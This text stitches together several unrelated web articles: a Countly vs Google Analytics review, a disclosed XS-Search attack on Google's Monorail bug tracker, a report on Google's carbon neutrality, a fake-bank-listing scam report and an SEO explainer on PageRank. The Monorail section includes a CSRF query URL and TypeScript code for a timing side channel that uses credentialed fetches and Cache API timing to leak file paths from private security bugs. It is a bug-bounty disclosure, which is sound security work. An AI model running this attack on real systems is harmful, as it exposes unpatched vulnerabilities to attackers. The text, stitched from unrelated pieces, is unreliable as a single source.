The initial installation of Countly isn’t too difficult. They offer a pretty convenient One-Liner Countly Installation script. According to the documentation they suggest a server with 2GB of RAM. I ran Countly on such a server for several months, but eventually downgraded to a server with 1GB of RAM, and haven’t encountered any issues so far.

The server that I use for Countly is a Linode 1GB Nanode VPS @ $5/mo. There’s also an equivalent Digital Ocean 1GB Droplet VPS @ $5/mo. Both of these VPS offerings come with 1TB of transfer, 1 vCPU, and 25GB of SSD, all of which is plenty for an analytics service. DO is getting more popular recently but I chose Linode because I already have a VPS with them for hosting the rest of my projects.

Regardless of where you get your VPS, you should pick the most recent Ubuntu LTS. This will provide maximum compatibility with the install script and should come with plenty of security updates. Run the installer on a fresh installation and everything will be taken care of. You’ll also want to go through the usual DNS and Let’s Encrypt SSL setup.

Installing Countly on my site was pretty straightforward. Google Analytics provides an HTML snippet which can be copied and pasted into the layout of a website. Of course, Countly works the same way.

Right now I’m running the website with both GA and Countly. Once I get more traffic and am satisfied that there aren’t too many discrepancies I’ll shut GA off completely.

What got Better?

First of all, the Countly interface is much more intuitive than Google Analytics. For example, it always takes me a few minutes to find the popular page list in GA.

Reduced bandwidth

As far as technical improvements go, the amount of data sent over the wire has decreased. My website already weighs in pretty low, so saving a few KB is a bigger deal with this site than with most sites.

Google Analytics:

  • /gtag/js 31.95 KB
  • /analytics.js 17.49 KB
  • collection event 458 B

Countly:

  • countly.min.js 8.08 KB
  • collection event #1 361 B
  • collection event #2 361 B

[Image: Network Traffic: Google Analytics vs. Countly]

As you can see, the difference is fairly large; GA usually consumes over 5x the network traffic (about 50 KB vs. 9 KB). Some of my pages take only 150 KB to load, sans analytics, so the savings are pretty nice. Another cool thing about Countly is that I’m able to host the analytics script from the main thomashunter.name domain.
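
A quick sanity check of those totals, using the sizes from the lists above (in KB):

```ts
const ga = 31.95 + 17.49 + 0.458;     // ≈ 49.9 KB per page load
const countly = 8.08 + 0.361 + 0.361; // ≈ 8.8 KB per page load
console.log(`${(ga / countly).toFixed(1)}x`); // ≈ 5.7x more traffic for GA
```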

Increased Event Tracking

Here are some numbers tracked over the past week, from December 20th to December 26th:

|                | Countly | Google Analytics | Diff |
|----------------|---------|------------------|------|
| Total Sessions | 1,633   | 1,268            | +27% |
| Total Visitors | 1,349   | 1,120            | +20% |

Countly receives data for at least 20% more users than Google Analytics. Why might that be? I suspect the two services track sessions differently and perform different bot detection.

But, more likely, the biggest contributor is the ad-blocking tools used by my visitors. These tools usually include a blacklist, and such a blacklist is more likely to contain the ubiquitous googletagmanager.com than my one-off analytics.phobosrising.co. And since my blog caters to a mostly technical audience, the odds of my visitors running ad-blocking tools are much higher than for the average internet user.

What got Worse?

Some Countly features are completely broken. The Traffic Sources screen doesn’t work (it thinks everything is “direct” traffic, though this is supposedly fixed in an update). The Versions screen isn’t useful for the web (it’s more for application versions). The Devices screen doesn’t seem to know what an Android device is.

Possibly the biggest issue is that it costs more. Google Analytics doesn’t have a monetary fee associated with it. However, the VPS costs $5/month, or $60/year.

Upgrading Countly is a time-consuming endeavor. GA, or any other SaaS solution, is going to be constantly updating itself behind the scenes. Upgrading Countly requires painful database migrations.

The issue which bothers me the least is that Countly displays less information. However, I didn’t use 90% of the information that GA provides, so I’m not too worried about it.

If you’re considering making the switch from one analytics platform to another then I would recommend writing a list of questions you need answered. Then, when evaluating alternatives, make sure the tool satisfies your needs.

Interface Screenshots

Here are a few graphical comparisons between the two tools. I personally find the Countly interface to be a little more modern. It also renders quicker than GA.

Overview

This first view is the overview, or dashboard view, of the system, showing some quick details for the selected timescale.

[Image: Countly Overview]

Note that Countly comes with a Week over Week view. Google Analytics has another screen, containing mostly the same details as in this screenshot, but with a WoW timeline as well.

[Image: Google Overview]

Page Listing

These two screens show the highest ranking pages based on popularity for the selected timescale.

[Image: Countly Page Listing]

The two screens show basically the same information.

[Image: Google Page Listing]


XS-Searching Google’s bug tracker to find out vulnerable source code

Or how side-channel timing attacks aren’t that impractical

Monorail is an open-source issue tracker used by many “Chromium-orbiting” projects, including Monorail itself. Other projects include Angle, PDFium, Gerrit, V8, and the Alliance for Open Media. It is also used by Project Zero, Google’s 0-day bug-finding team.

This article is a detailed explanation of how I could have exploited Google’s Monorail issue tracker to leak sensitive information (vulnerable source code files and line numbers) from private bug reports through an XS-Search attack.

Where to start?

One of the first functionalities I looked into when analyzing Monorail was the ability to download the result of a certain search query as a CSV.

It didn’t take me long to notice that it was vulnerable to a CSRF attack. In other words, it was possible to force a user to download a CSV containing the results of a search query if a malicious link was accessed.

https://bugs.chromium.org/p/chromium/issues/csv?can=1&q=Restrict=View-SecurityTeam&colspec=ID

As seen in the image, there were no protections against CSRF attacks. So, for example, a request made with the “Restrict-View-SecurityTeam” tag would end up filtering the results to undisclosed security-related issues only. If a member of the Google security team or a high profile bug reporter were to access this link, they would download a CSV containing all undisclosed issues they have access to.

Come again? An XS-Search attack?

Combining these two vulnerabilities we have all that is needed to perform a Cross-Site Search (XS-Search) attack:

  1. Capacity to perform complex search queries.
  2. Capacity to inflate the response of a search query.

The second point is particularly important. If the response of a search query matches a bug, we can make the CSV significantly bigger than that of a query that doesn’t.

Because of this big difference in response length, it’s possible to calculate the time each request takes to complete and then infer whether the query returned results or not. This way, we achieve the ability to ask cross-origin boolean questions.

The phrase “cross-origin boolean questions” sounds weird, but it essentially means we’re able to ask questions like “is there any private bug that matches the folder `src/third_party/pdfium/`?” and obtain the answer cross-origin. This involves several steps that will be described in the following section.

For now, the examples below demonstrate the core of the issue:

1st case — CSV generated from query "Summary: This bug exists".
2nd case — CSV generated from query "Summary: This bug doesn't exist".
3rd case — CSV generated from query "Summary: This bug exists OR Summary: This bug doesn't exist".

As we can see, in the first and third cases we would have an arbitrarily big CSV, because both queries match a bug with the summary “This bug exists”. In the second case, the CSV would be empty (containing only the header), because the query didn’t match any bug with the summary “This bug doesn’t exist”. Note that in the third case we are using the logic operator OR to query the first and second cases together.

To ask or not to ask?

One of the problems I had when trying to create a PoC was deciding what to search for. Monorail’s search doesn’t allow us to query for specific letters in a report, only words. This meant that we couldn’t brute-force the report character by character.

After realizing this, I had to take a step back and search older bug reports looking for information that was relevant and could realistically be exfiltrated by the attack.

That’s when I learned that many Chromium bug reports indicate the file path and line number where the vulnerability can be found.

Example from https://bugs.chromium.org/p/chromium/issues/detail?id=770148

That’s perfect for a XS-Search attack: since the folder structure of Chromium is public and Monorail treats slashes as words delimiters (a query for “path/to/dir” also includes results for bugs containing the string “path/to/dir/sub/dir”), we can easily generate the appropriate search queries.

So our attack would look something like this:

  1. We find out if there’s any private bug report that mentions a file in Chromium’s source tree. We do this using https://cs.chromium.org/chromium/src/ as the base query.
  2. We search for the first half of all the directories under src/ using the OR operator (e.g., src/blink OR src/build…).
  3. We keep repeating step 2 using the binary search algorithm. If anything was found (i.e., a big CSV was generated), we restrict the search space to the first half. Otherwise (i.e., an empty CSV was generated), we restrict the search space to the second half.
  4. After eliminating all directories but one, we restart step 2, but now adding the newly found directory to the end of the base query.

At the end of this process, the full URL will have been leaked and we can now (as an attacker) look into the corresponding file and try to find the vulnerability that was reported.
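
To make that loop concrete, here's a minimal TypeScript sketch of the binary search, under the simplifying assumption that a single timed fetch can tell a big CSV from an empty one (the Cache API refinement described below is what made this reliable in practice). The query parameters mirror the CSV URL shown earlier; THRESHOLD_MS and the function names are made up for illustration:

```ts
const CSV_ENDPOINT = 'https://bugs.chromium.org/p/chromium/issues/csv';
const THRESHOLD_MS = 200; // made-up cutoff separating "big" from "empty" responses

// Naive timing oracle: a query matching private bugs yields a much bigger,
// and therefore slower, CSV than a query matching nothing.
async function queryMatches(q: string): Promise<boolean> {
  const start = performance.now();
  await fetch(`${CSV_ENDPOINT}?can=1&q=${encodeURIComponent(q)}&colspec=ID`, {
    mode: 'no-cors',        // we never read the body, we only time the request
    credentials: 'include', // the victim's session decides which bugs are visible
  });
  return performance.now() - start > THRESHOLD_MS;
}

// Binary-search one path segment: OR together half the candidates and
// keep whichever half the timing oracle says contains a match.
async function leakNextSegment(basePath: string, candidates: string[]): Promise<string> {
  while (candidates.length > 1) {
    const firstHalf = candidates.slice(0, Math.ceil(candidates.length / 2));
    const query = firstHalf.map((dir) => `${basePath}/${dir}`).join(' OR ');
    candidates = (await queryMatches(query))
      ? firstHalf
      : candidates.slice(firstHalf.length);
  }
  return candidates[0];
}
```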

One request to rule them all

You might be wondering how we obtained the size of the CSV in step 3. Since the Same-Origin policy forbids us from accessing information across different origins, a naive response.length won’t work.

While we can’t know for sure the exact size of a response, we can measure the time each request takes to complete. Using the response-length inflation technique covered in previous sections, searches returning a bug would be a lot slower to finish than ones that do not.

However, to achieve a high degree of certainty, simply doing one request isn’t enough. We would need to request the same page many times and measure the average response time to obtain a reliable exploit.

That’s when the Cache API comes in handy: by making only one request and repeatedly measuring how long the response takes to be cached, it’s possible to infer with certainty whether the search query returned bugs.

In other words, a small response takes less time to be cached than a bigger one. Given that there are almost no limitations on the Cache API (and that it is extremely fast), we can cache and measure the same response several times and then compare the measurements with those of a known empty search query result. This lets us easily differentiate a large response from a small or empty one, filtering out hardware and network variance, and increases the exploit’s speed and reliability.
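
Here's a hedged sketch of that measurement, not the author's actual exploit code (that's linked below): fetch the CSV once with the victim's cookies, then repeatedly time how long the Cache API takes to store clones of the response:

```ts
// Fetch the search result once, opaquely, with the victim's cookies attached.
function fetchOpaque(url: string): Promise<Response> {
  return fetch(url, { mode: 'no-cors', credentials: 'include' });
}

// Average how long cache.put() takes for the same response: bigger bodies
// take measurably longer to store than empty ones.
async function averageCacheTime(response: Response, trials = 20): Promise<number> {
  const cache = await caches.open('probe');
  let total = 0;
  for (let i = 0; i < trials; i++) {
    const clone = response.clone(); // keep the original response reusable
    const start = performance.now();
    await cache.put('https://attacker.example/probe', clone);
    total += performance.now() - start;
  }
  return total / trials;
}

// Compare the average against a baseline measured on a known-empty query's
// response: a clearly higher value means the query matched at least one bug.
```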

For more information on how this can be implemented you can check the exploit’s code.

Aftermath

In total, I found three different places where this attack could be carried out, which resulted in CVE-2018-10099, CVE-2018-19334, and CVE-2018-19335.

I was also rewarded $3,133.70 for each vulnerability, totaling over $9,400.

Contact

If you have any questions, caught some typo or something that I missed, feel free to contact me on @lbherrera_


How Google Keeps Its Power-Hungry Operations Carbon Neutral

[Image: Google sustainability officer Kate Brandt urges others to embrace the “circular economy.” Photo: Callie Giovanna/TED]

Kate Brandt has a radical idea for how we’ll have to live in the future, if we’re going to be in balance with nature. She envisions a world without landfills, where ownership is obsolete, and everything down to the socks on our feet is rented and shared. Brandt is Google’s sustainability officer. And she’s obsessed with one idea: the “circular economy,” which aims to eliminate waste. This would require products and materials to be kept in use, rather than thrown away, and for the world to be powered by renewable energy.

At Google, Brandt is employing this ethos at scale. At TEDWomen 2018, a conference for women thought leaders in Palm Desert, California, this week, she issued a challenge to the rest of the tech industry to do the same.

The timing is good—and necessary. A recent report from the US government paints a dire picture of what will happen to our planet if we don’t aggressively counteract climate change in the next decade. That’s in line with the UN’s report from October, which concluded that humans have about 12 years to reverse current trends before we do irreversible harm.

Brandt is focused on implementing this vision at the buildings that house Google employees and at Google’s 14 data centers around the globe. The company has been carbon-neutral since 2007, which requires a lot of work to offset its substantial power demands. Google achieves this three ways, according to its most recent Environmental Report: by reducing its demand, by buying renewables to match its use of non-renewable energy, and with other offsets, like capturing methane gas from animal waste.

Data centers are a large source of emissions. According to a recent report in the journal Nature, data centers use 200 terawatt-hours of energy a year—roughly 1 percent of global electricity use.

Google estimates that each search emits roughly 0.2 grams of CO2 into the atmosphere, due to the energy it takes to power the cables, routers, and servers that make Google work. That’s on par with the energy it takes to power a lightbulb for 17 seconds. Watching or uploading a video to YouTube is worse for the environment: 1 gram of carbon for every 10 minutes of viewing, according to The Guardian. Experts estimate that internet companies put out as much CO2 as the airline industry.1

As Google grows, “We are committed to neutralizing all the carbon emissions associated with our operations,” Brandt says. That sounds great, but how do you actually do it?

“First we applied machine learning to the cooling of data centers,” Brandt says, cutting energy use by the cooling system by 30 percent.

Google designed servers that will last longer and be easier to reuse. “We are taking components from old servers, and we are keeping them in our new machines. We’re remanufacturing new servers from old ones. And we sell old servers on secondary markets after wiping them clean,” she says. In 2017, that meant 18 percent of Google’s new servers were remanufactured machines, and 11 percent of components used for machine upgrades were refurbished inventory. The company sold more than 2 million used machines to others.

Google also bought 3 gigawatts of wind and solar last year to offset the energy use of its data centers, allowing the company for the first time to match 100 percent of its energy use with renewables. Though that tactic has long been a component of its carbon-neutral effort, 2017 was the first year it was able to buy enough clean energy to offset all its data center energy consumption. “For every kilowatt-hour of energy we consume, we add a matching kilowatt-hour of renewable energy to a power grid somewhere,” Urs Hölzle, a Google senior vice president, wrote in a blog post earlier this year.

Google is far from alone in embracing the circular economy. Nike, Brandt points out, is designing out waste in how it harvests materials and makes products. She points also to Renault and Walmart as companies embracing reusable materials and 100 percent renewable energy, respectively. “But no one else in the data center industry is applying this circular approach at scale,” she says.

Though she doesn’t call them out specifically, streaming services could have a huge impact if they answered Brandt’s call, since streaming services like Netflix account for a majority of global broadband traffic. Greenpeace has singled out Netflix for not making commitments to reduce its climate impact. Amazon has taken heat for not being open about its sustainability efforts and climate impacts, receiving an F rating in 2016 from the Carbon Disclosure Project, which called it out as the largest US company to refuse transparency. Netflix and Amazon did not respond to requests for comment.

Microsoft doesn’t call it a circular economy approach, but it’s been making big strides in sustainability for the past six years. Microsoft created an internal carbon tax to help reduce its emissions. Since implementing it in 2012, the company has been carbon-neutral, and it has pledged to cut its absolute emissions by 75 percent by 2030.

The good news is that the circular economy is an idea whose time may have come. The urgency of recent climate reports has led not just a handful of companies to embrace the idea of renewable and circular manufacturing, but also countries. The European Union’s parliament embraced it this year and is considering advancing broader circular economy goals. Japan and China are both introducing circular goals into their economies.

Getting more businesses to buy in is a hard ask. But it’s potentially a profitable one. “Today we have so many materials that are used once. There is still so much intrinsic value that is left in those materials, but we aren’t designing them to retain that value,” Brandt says. She points to a recent study estimating that if industry embraced a circular economy, it could boost economic output by $4.5 trillion by 2030, by cutting down on the cost of buying new materials in favor of reusing and remanufacturing existing materials. There’s a symmetry to that year: It’s the deadline after which the UN estimates humans will not be able to recover from the climate impacts we’ve had on Earth. By embracing the circular economy, Brandt hopes humans can mitigate disaster without even losing money in the process.

1 CORRECTION, Dec. 1, 8:10 PM: An earlier version of this story included an outdated estimate for the CO2 emissions for each search.



New form of Google banking scam

A few days ago, a cousin of mine called me. He had just had INR 9000 (~$125) wiped from his account in a telephone banking scam. So how did this educated and tech savvy guy in his 20s, well aware of such scams, end up in this situation?

He had fallen prey to an innovative type of scam that is plaguing multiple businesses listed on Google. Often when you search for a business on Google, you will see a card for it. It contains details like address, timings, and a phone number with the option to call them directly from the browser/app itself. This is similar to what my cousin saw when he searched for his local bank branch on Google.

[Image: Business card of the bank visible on Google]

Pay close attention to the phone number listed on the screen. (Do not call it! It belongs to a scammer.) Upon calling that number for help regarding a failed online transaction, my cousin was greeted by a person pretending to be a bank employee. After a short conversation where my cousin explained his issue, he was asked for his card number and CVV. Trusting the scammer, he ended up giving the details and subsequently lost the entire sum in his account.

Now I do understand that most would blame the person giving out his card details for being foolish enough to do so. I concur. However, in this case the victim is not so much to blame for trusting the scammer as for trusting Google to provide him accurate information.

As we grow ever more reliant on technology, there is a subtext of trust that underlies every interaction we make via any app or website. When you see any information listed on a website, your first reaction isn’t to immediately question whether or not that information is accurate. It is to blindly trust the technology that has helped you unfailingly countless times in the past. That is precisely why this scam is so potent.

On further investigation we realised that the same scammer had his phone number registered for multiple bank branches in the same region. This is partly because of how easy it is to claim a business on Google. I did not want to do anything illegal or harmful for the sake of an article, so I did not try it out myself. But as explained in this video, it is fairly easy and there seems to be little to no verification. I am sure Google has resolved such conflicts in the past where an original business owner had his/her business falsely claimed by someone else. However, their method seems to be to appeal to the current owner to add you as an admin or transfer ownership. If that doesn’t work, you appeal directly to Google to transfer ownership to you. It does seem to be a mess, but I hope it works in most cases. Again, there is a lot of trust even on Google’s side that people won’t claim businesses they don’t own. There does not seem to be a channel to report fraudsters such as these – you can only request an ownership transfer if you own the business.

What can be said of an Indian public sector bank though? Technically they cannot be held liable for any incorrect information that does not appear on their own website. I doubt they’d care enough to go through Google’s appeal process. My fears were further confirmed when I decided to look up my local SBI branch on Google.
[Image: Business card of my local bank on Google]

There are multiple reviews claiming the listed number is fake. As of now, both fake numbers are still listed. A lot of information you see on Google is user contributed and often not vetted by any human. So do think twice next time you trust any information listed on Google. And if it’s a bank phone number, definitely don’t.

Know of any other such deceptive scam methods? Tell me about it.

EDIT (26/11/2018): Since the time of publishing this post, reports of this scam have been published by multiple news outlets.


Google PageRank is NOT Dead: Why It Still Matters in 2018

Have you been involved in SEO for more than a couple of years? You probably remember Google’s Toolbar PageRank.

Here’s what it looked like:

It showed the Google PageRank of every page you visited on a logarithmic scale from 0–10.

But even before Google officially removed support for Toolbar PageRank in 2016, it had already gone unupdated for years. For this reason, some SEOs view PageRank as an outdated and irrelevant metric that has no place in modern-day SEO.

Here’s a comment I found on another article about PageRank that sums up this way of thinking:

[Image: a comment dismissing PageRank]

Pretty brutal. But here’s the thing: PageRank still plays a vital role in Google’s ranking algorithm.

How do I know this? Google said so.

DYK that after 18 years we’re still using PageRank (and 100s of other signals) in ranking?

Wanna know how it works? https://t.co/CfOlxGauGF pic.twitter.com/3YJeNbXLml

— Gary “鯨理” Illyes (@methode) February 9, 2017

(Gary Illyes works for Google. So that tweet is straight from the horse’s mouth, so to speak.)

But this year‐old tweet isn’t my only evidence. Just a month ago, Gary Illyes spoke at a conference I attended in Singapore (here’s me with him!). In his talk, he reminded the audience that PageRank is still a part of their algorithm; it’s just that the public score (i.e., Toolbar PageRank) no longer exists.

With that in mind, the aim of this post is threefold:

  1. To set the record straight about the importance and relevance of PageRank in 2018;
  2. To explain the basics of the PageRank formula;
  3. To discuss other similar metrics that exist today, which may make suitable replacements for the deprecated public PageRank “score.”

What is Google PageRank?

PageRank (PR) is a mathematical formula that judges the “value of a page” by looking at the quantity and quality of other pages that link to it. Its purpose is to determine the relative importance of a given webpage in a network (i.e., the World Wide Web).

Google co‐founders Sergey Brin and Larry Page devised PageRank in 1997 as part of a research project at Stanford University. They described their motivation as follows:

“Our main goal is to improve the quality of web search engines.”

That brings us to an important point: Search engines weren’t always as efficient as Google is today. Early search engines like Yahoo and Altavista didn’t work very well at all. The relevance of their search results left a lot to be desired.

Here’s what Sergey and Larry said about the state of search engines in their original paper:

“Anyone who has used a search engine recently can readily testify that the completeness of the index is not the only factor in the quality of search results. ‘Junk results’ often wash out any results that a user is interested in.”

PageRank aimed to solve this problem by making use of the “citation (link) graph of the web,” which the duo described as “an important resource that has largely gone unused in existing web search engines.”

The idea was inspired by the way scientists gauge the “importance” of scientific papers. That is, by looking at the number of other scientific papers referencing them. Sergey and Larry took this concept and applied it to the web by tracking references (links) between web pages.

It was so effective that it became the foundation of the search engine we now know as Google, and it still is.

How does Google PageRank work?

Here’s the full PageRank formula (and explanation) from the original paper published in 1997:

We assume page A has pages T1…Tn which point to it (i.e., are citations). The parameter d is a damping factor which can be set between 0 and 1. We usually set d to 0.85. There are more details about d in the next section. Also C(A) is defined as the number of links going out of page A. The PageRank of a page A is given as follows:

PR(A) = (1‐d) + d (PR(T1)/C(T1) + … + PR(Tn)/C(Tn))

Note that the PageRanks form a probability distribution over web pages, so the sum of all web pages’ PageRanks will be one.

Confused? Let’s simplify.

Google takes into account three factors when calculating the PageRank of a web page, which are:

  • The quantity and quality of inbound linking pages;
  • The number of outbound links on each linking page;
  • The PageRank of each linking page.

Let’s say that page C has two links: one from page A and one from page B. Page A is stronger than page B, and also has fewer outgoing links. Feed this information into the PageRank algorithm, and you get the PageRank of page C.
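
Here's that example worked through with made-up numbers as a quick TypeScript sketch. Assume PR(A) = 0.8 with two outgoing links, PR(B) = 0.4 with four, and the usual damping factor of 0.85 (all values are assumptions for illustration):

```ts
const d = 0.85; // damping factor

// PR(C) = (1 - d) + d * (PR(A)/C(A) + PR(B)/C(B))
const prC = (1 - d) + d * (0.8 / 2 + 0.4 / 4);
console.log(prC); // 0.575
```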


The PageRank formula also has a so‐called “damping factor” which simulates the probability of a random user continuing to click on links as they browse the web. This is perceived to decrease with each link click.

Think of it like this: The probability of you clicking a link on the first page you visit is reasonably high. But the likelihood of you then clicking a link on the next page is slightly lower, and so on and so forth.

With that in mind, the total “vote” of a page is multiplied by the “damping factor” (generally assumed to be 0.85) with each iteration of the PageRank algorithm.

If the BBC links to a page via four “link‐hops,” the value of that link would be “damped down” to such an extent that the final page would hardly feel the benefit. But if they link to that same page via only two link‐hops, that link will have a strong influence on the page.
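
To put rough numbers on that, treat each extra hop as one more multiplication by the damping factor (a back-of-the-envelope view that ignores how PageRank also splits across each page's other outgoing links):

```ts
const d = 0.85;
console.log(d ** 2); // ≈ 0.72 of the value survives two link-hops
console.log(d ** 4); // ≈ 0.52 survives four, roughly half
```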


Editor’s note

You might be wondering:

“What if we didn’t know the PageRank of page A or page B?”

This would be like asking the following question:

If Sergey gives half of his money to Larry, how much money does Larry have?

You can’t answer this question because a vital piece of information is missing: The amount of money Sergey had in the first place.

It’s a crude analogy, yes, but it relates to the PageRank algorithm because to calculate the PageRank of every other page in the network, you first need to know the PageRank of at least one page, right?

So how does Google overcome this problem?

Here’s another excerpt from the original PageRank paper:

PageRank or PR(A) can be calculated using a simple iterative algorithm and corresponds to the principal eigenvector of the normalized link matrix of the web.

Sound like gobbledygook?

It basically means that Google’s PageRank algorithm can calculate the PR of a page without knowing the definitive PageRank of the linking pages. This is because PageRank isn’t really an absolute “score,” but rather a relative measure of a webpage’s quality compared to every other page on the link graph (i.e., web).
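
In code, the iterative idea looks roughly like the sketch below: start every page at a uniform guess and re-apply the formula until the values settle. This toy version follows the paper's PR(A) = (1 - d) + d(...) form and ignores pages with no outgoing links:

```ts
// links[i] lists the pages that page i links to.
function pageRank(links: number[][], d = 0.85, iterations = 50): number[] {
  const n = links.length;
  let pr: number[] = new Array(n).fill(1 / n); // uniform initial guess
  for (let step = 0; step < iterations; step++) {
    const next: number[] = new Array(n).fill(1 - d);
    links.forEach((outs, i) => {
      for (const target of outs) {
        next[target] += (d * pr[i]) / outs.length; // each link passes an equal share
      }
    });
    pr = next;
  }
  return pr;
}

// Toy graph: A links to B and C; B links to C; C links to A.
console.log(pageRank([[1, 2], [2], [0]]));
```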

Read this article if you want to geek out and learn more.


Why did Google remove the public PageRank score?

Here’s what a Google spokesperson said in 2016:

As the Internet and our understanding of the Internet have grown in complexity, the Toolbar PageRank score has become less useful to users as a single isolated metric. Retiring the PageRank display from Toolbar helps avoid confusing users and webmasters about the significance of the metric.

But there was almost certainly another contributing factor to the decision: link spam.

It’s fair to say that SEOs have long been obsessed with PageRank as a ranking factor, perhaps because the so‐called “toolbar PageRank” offered a visible gauge, quite literally, as to the rank worthiness of a webpage.

No such visual gauge existed for any other ranking factors, which made it seem like PageRank was the only factor that mattered. As a result, people soon started buying and selling “high PR” links. It became a huge industry, and still is.


some “high PR” links for sale on Fiverr right now

If you’re wondering how link sellers build these “high PR” links in the first place, there are many ways. In the mid‐2000s, one of the primary acquisition tactics was to leave blog comments.

For Google, this was a big problem. Links were originally a good judge of quality because they were given out naturally to deserving pages. Unnatural links made their algorithm less effective at discerning the high‐quality pages from the low‐quality ones.

The introduction of “nofollow”

In 2005, Google partnered with other major search engines to introduce the “nofollow” attribute, which let webmasters stop the transfer of PageRank via specific links (e.g., blog comments). That removed much of the incentive for comment spam.

Here’s an excerpt from Google’s official statement on the introduction of “nofollow”:

If you’re a blogger (or a blog reader), you’re painfully familiar with people who try to raise their own websites’ search engine rankings by submitting linked blog comments like “Visit my discount pharmaceuticals site.” This is called comment spam, we don’t like it either, and we’ve been testing a new tag that blocks it. From now on, when Google sees the attribute (rel=“nofollow”) on hyperlinks, those links won’t get any credit when we rank websites in our search results.

Nowadays, almost all CMSs “nofollow” blog comment links by default.

But as Google solved one problem, another problem was made accidentally worse.

PageRank sculpting

The original PageRank formula states that PageRank is divided equally between the outgoing links on a webpage. So if the PageRank of a page is y and the page has ten outgoing links, the amount of PageRank transferred via each link is y/10.

But what happens if you add a “nofollow” attribute to 9 of those 10 links? Surely it stops the flow of PageRank to nine of those pages, leaving the full PageRank value to be transferred via only one link on the page, right?


Initially, yes, that was the case, and webmasters soon began selectively adding the “nofollow” attribute to links pointing at pages they deemed less important. This allowed them to effectively “sculpt” the flow of PageRank around their sites.

For example, if they had a page with a PageRank score of 7 (according to the public PR score on the toolbar), and they wanted to boost the “power” of a specific page, they would just link to it from the high PR page and “nofollow” all the other links on the page. That way, the maximum amount of PageRank would be sent to their page of choice.

Google made changes to this in 2009. Here’s an excerpt from Matt Cutts’ blog post on the matter:

So what happens when you have a page with “ten PageRank points” and ten outgoing links, and five of those links are nofollowed? […] Originally, the five links without nofollow would have flowed two points of PageRank each […] More than a year ago, Google changed how the PageRank flows so that the five links without nofollow would flow one point of PageRank each.

Here’s an illustration of the difference:

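Putting numbers on Matt’s example (a sketch of the arithmetic only, not Google’s actual code):

```python
# Matt Cutts' example: a page with 10 "PageRank points",
# 10 outgoing links, 5 of them nofollowed.
points, total_links, followed_links = 10, 10, 5

# Pre-2009: nofollowed links were excluded from the division,
# so the remaining "dofollow" links soaked up all the value.
old_value_per_link = points / followed_links   # 2.0 points each

# Post-2009: the division happens across ALL links, and the share
# allocated to nofollowed links simply evaporates.
new_value_per_link = points / total_links      # 1.0 point each

print(old_value_per_link, new_value_per_link)  # 2.0 1.0
```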

We don’t know if this is still how the ‘nofollow’ maths works. Google made this change nine years ago. Things may be different now. It’s possible that other factors (e.g., the position of a link on a page) now also influence how much value a given link transfers.

But what we do know for sure is that adding “nofollow” tags to some links won’t help to funnel more “link juice” towards the rest of the links on the page.

Google (slowly) axes the public PageRank score

Shortly after changing the way PageRank is passed between so‐called ‘dofollow’ and ‘nofollow’ links on a page, Google removed PageRank data from Webmaster Tools.

Then, in 2014, support for the public PageRank metric took another blow when Google’s John Mueller stated that people should stop using PageRank as it would no longer be updated.

“I wouldn’t use PageRank or links as a metric. We’ve last updated PageRank more than a year ago (as far as I recall) and have no plans to do further updates. Think about what you want users to do on your site, and consider an appropriate metric for that.”

In 2016, Toolbar PageRank was officially axed.

This move made the buying and selling of “high PR links” more difficult as there was no way to find out the “true” PageRank of a webpage.

Is there a suitable replacement for the public PageRank score?

No replica of PageRank exists. Period.

But there are a few similar metrics around, one of which is Ahrefs’ URL Rating (UR).

Sidenote.

Moz and Majestic also have some proprietary metrics that work in a similar way to PageRank. Feel free to check out the documentation on their creators’ websites to learn more. In this article, however, we’ll only be talking about Ahrefs’ URL Rating (UR) because it’s a metric that we fully understand and trust.

What is URL Rating?

“Ahrefs’ URL Rating (UR) is a metric that shows how strong the backlink profile of a target URL is on a scale from 1 to 100.”

How do you see the URL Rating of a page? Just paste it into Site Explorer.

[Screenshot: URL Rating shown in Site Explorer]

Or use Ahrefs’ SEO toolbar.

[Screenshot: URL Rating shown in Ahrefs’ SEO toolbar]

How is URL Rating (UR) similar to PageRank?

We want to be transparent here, so it’s important to note that while we calculate URL Rating (UR) in a similar way to the original version of Google PageRank, it’s not the same. Nobody outside of Google knows how the PageRank formula has developed over the years.

But we do know that URL Rating (UR) is comparable to the original Google PageRank formula in the following ways:

  • We count links between pages;
  • We respect the “nofollow” attribute;
  • We have a “damping factor”;
  • We crawl the web far and wide (which is a critical component when calculating an accurate link‐based metric).

Remember: This is how URL Rating (UR) compares to the original PageRank formula. Google has almost certainly iterated and improved upon their formula in the 21 years since its inception.

How do we know this? Well, for a start, it’s a reasonable assumption to make. We know Google hasn’t stood still all this time because their search results are by far the best of any search engine.

But here’s a quote from Matt Cutts, which I found, once again, in his 2009 blog post on PageRank sculpting:

“Even when I joined the company in 2000, Google was doing more sophisticated link computation than you would observe from the classic PageRank papers. If you believe that Google stopped innovating in link analysis, that’s a flawed assumption. Although we still refer to it as PageRank, Google’s ability to compute reputation based on links has advanced considerably over the years.”

How does URL Rating (UR) differ from Google PageRank?

Google has filed many patents over the years, which are publicly accessible. But nobody, not even Bill Slawski, knows which factors are part of the live algorithm or how much weight they each receive.

This fact alone makes it very difficult to know how URL Rating (UR) differs from the current iteration of Google PageRank because we don’t fully understand how Google judges the value of a link in 2018.

Even when it comes to seemingly basic things, like the way links get counted, things aren’t as straightforward as you might assume. To illustrate, take a look at this image:

[Image: link-counting example]

This is a great test when interviewing SEOs.

Ahrefs’ crawler counts eight links to page B, but not every crawler works the same way.

We have no clue how Google counts them.

Furthermore, the actual counting of links is only one part of the equation. When you start calculating how much value each of those links passes, the complexity reaches a whole new level.

Here are some other questions we don’t know the answers to:

1. Does the transfer of PageRank vary according to the location of the link on the page?

Google’s reasonable surfer patent indicates that this may be the case.

In particular, it’s thought that links higher up in the document may transfer more PageRank than those lower down. Same goes for links in the sidebar vs. links in the main content.
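Nobody outside Google knows what weights, if any, are used. But the idea behind the patent is easy to sketch: instead of splitting a page’s vote equally between links, weight each link by how likely a “reasonable surfer” is to click it. The weights below are pure guesses for illustration:

```python
# Hypothetical "reasonable surfer" weighting: a link's share of the
# page's vote is proportional to an assumed click likelihood.
# (These weights are invented for illustration only.)
link_weights = {
    "main-content link, above the fold": 1.0,
    "main-content link, below the fold": 0.6,
    "sidebar link": 0.3,
    "footer link": 0.1,
}

page_vote = 1.0
total_weight = sum(link_weights.values())

for link, weight in link_weights.items():
    share = page_vote * weight / total_weight
    print(f"{link}: {share:.2f}")
# main-content link, above the fold: 0.50
# main-content link, below the fold: 0.30
# sidebar link: 0.15
# footer link: 0.05
```

Under equal splitting, each of these four links would pass 0.25; under this weighting, the prominent content link passes ten times as much as the footer link.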


